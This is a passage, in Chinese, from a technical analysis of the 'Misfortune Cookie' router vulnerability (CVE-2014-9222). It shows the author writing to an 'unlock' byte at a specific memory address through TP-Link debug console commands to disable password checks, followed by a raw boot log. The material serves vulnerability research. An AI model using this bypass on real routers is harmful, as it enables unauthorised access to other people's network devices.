技術(shù)分析：“厄運cookie”漏洞（CVE-2014-9222）解密

這里有一個小小的提醒，ac30fffc是”sw $s0, -4($at)”的16進制值。現(xiàn)在我們可以確定解壓后的鏡像基址在0×80020000。這如上面所提及到的，我們知道”解鎖”字節(jié)在地址0x8034FF94上，如果我們將它從”1”改到”0”，那么此時路由應該不需要密碼驗證了。讓我們來試試看：

atrb8034ff94 8034FF94:01   OK atwb8034ff94,0 OK atgo80020000   Copyright(c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD initializech = 0, TC2105MJ, ethernet address: 14:cc:20:57:38:2a initializech = 1, ethernet address: 14:cc:20:57:38:2a WanChannel init ........ done Reset dmt Check DMTversion =b2 ........ InitializingADSL F/W ........ done ADSL HWversion: b2, HCLK 140 ok   ==>natTableMemoryInit <==natTableMemoryInitANNEXAIJLM US bitswapon,DS bitswap on OlrON SRAON Testlab 32 largeD flag=2(0:maxD=64, 1:maxD=128, 2:maxD=511) portreverse: on   inputline: sysdisa Erasing 4KSector...   Erasing 4KSector...   writeRomBlock():Erase OK! ble PM! DyingaspOFF! dhcpaddress probe action is disabled Valid Lossof power OFF! rundistributePvcFakeMac! set trymultimode number to 3 (dropmode try num 3) Syncookieswitch On! rundistributePvcFakeMac! rundistributePvcFakeMac! run d Erasing 4KSector...   Erasing 4KSector...   writeRomBlock():Erase OK! istributePvcFakeMac! rundistributePvcFakeMac! rundistributePvcFakeMac! rundistributePvcFakeMac! rundistributePvcFakeMac! rundistributePvcFakeMac! PressENTER to continue... cawan$curl 192.168.1.1